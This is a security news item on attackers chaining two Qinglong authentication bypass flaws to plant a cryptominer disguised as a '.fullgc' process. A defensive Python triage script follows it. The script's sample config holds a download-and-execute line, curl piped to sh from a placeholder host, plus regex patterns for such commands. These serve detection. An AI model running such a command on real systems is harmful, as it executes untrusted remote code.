Security News

Cybersecurity news aggregator

HIGH Vulnerabilities SC Media

Hackers exploit Qinglong vulnerabilities to deploy cryptominers

Attackers are exploiting two chained authentication bypass vulnerabilities (CVE-2026-3965 and CVE-2026-4047) in the Qinglong task scheduler to achieve remote code execution and deploy cryptominers. The CVSS score for CVE-2026-3965 is 6.3 (MEDIUM), and the vulnerabilities affect Qinglong versions 2.20.1 and older. While maintainers released an update, the initial fix was insufficient; a subsequent, more effective patch was provided later to address the authentication bypass.

Vulnerability Management, Patch/Configuration Management | May 1, 2026 | By SC Staff

As reported by Bleeping Computer, hackers are actively exploiting two authentication bypass vulnerabilities in the popular open-source task scheduling tool Qinglong to deploy cryptominers on developers' servers. The exploitation began in early February, prior to the public disclosure of the security flaws at the end of the month.

The vulnerabilities, identified as CVE-2026-3965 and CVE-2026-4047, affect Qinglong versions 2.20.1 and older. They can be chained together to achieve remote code execution. The flaws stem from a mismatch between the security middleware's assumptions and the Express.js routing behavior, allowing attackers to bypass authentication.

Attackers have been targeting publicly exposed Qinglong panels since February 7, modifying the config.sh file to download and execute a cryptominer disguised as a hidden process named ".fullgc". This process consumes significant CPU resources, mimicking an innocuous but intensive system process to evade detection. The downloaded miner variants support multiple architectures, including Linux x86_64, ARM64, and macOS.

While Qinglong maintainers released an update, the initial fix was insufficient, with a more effective patch addressing the authentication bypass arriving later. The ongoing exploitation highlights the risks associated with unpatched open-source software.

Source: Bleeping Computer
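A host triage check built from the two indicators the article reports (a config.sh modified to download and execute a payload, and a hidden process named ".fullgc"), added here as an example and not taken from the article, Qinglong, or its maintainers. The regex heuristics, function names, and sample data are assumptions constructed for illustration.

```python
import re

# Indicator from the article: the miner runs as a hidden process named ".fullgc".
MINER_PROCESS_NAME = ".fullgc"

# Heuristics (assumptions, not from the article): a line that fetches remote
# content AND hands it to an interpreter or makes it executable.
FETCH = re.compile(r"\b(curl|wget)\b[^\n#]*https?://", re.I)
EXEC = re.compile(r"\|\s*(ba|z|da)?sh\b|\bchmod\s+\+x\b|\bbase64\s+(-d|--decode)\b|\beval\b")

def suspicious_config_lines(config_text):
    """Return (line_number, line) for non-comment lines that look like
    download-and-execute, or that mention the miner's process name."""
    hits = []
    for n, line in enumerate(config_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if MINER_PROCESS_NAME in stripped or (FETCH.search(stripped) and EXEC.search(stripped)):
            hits.append((n, stripped))
    return hits

def hidden_miner_processes(proc_table):
    """proc_table: iterable of (pid, comm, cpu_percent), e.g. parsed from
    `ps -eo pid,comm,pcpu`. Matches on the basename of the command."""
    return [(pid, comm, cpu) for pid, comm, cpu in proc_table
            if comm.rsplit("/", 1)[-1] == MINER_PROCESS_NAME]

# Constructed sample input: not real Qinglong settings, not real attacker content.
SAMPLE_CONFIG = "\n".join([
    "# constructed sample config.sh",
    'export PROXY_URL="http://proxy.invalid:8080"',
    "curl -s https://placeholder.invalid/health > /dev/null",  # fetch only: not flagged
    "curl -s http://placeholder.invalid/a | sh",               # fetch + execute: flagged
])
SAMPLE_PROCS = [(1, "systemd", 0.1), (4211, ".fullgc", 97.5), (4300, "node", 3.0)]

if __name__ == "__main__":
    for n, line in suspicious_config_lines(SAMPLE_CONFIG):
        print(f"config.sh:{n}: review this line: {line}")
    for pid, comm, cpu in hidden_miner_processes(SAMPLE_PROCS):
        print(f"pid {pid} ({comm}) at {cpu}% CPU matches the reported miner name")
```

A clean result does not show a host was never compromised; any Qinglong instance at version 2.20.1 or older that was publicly reachable still needs the later patch and a review of config.sh against a known-good copy.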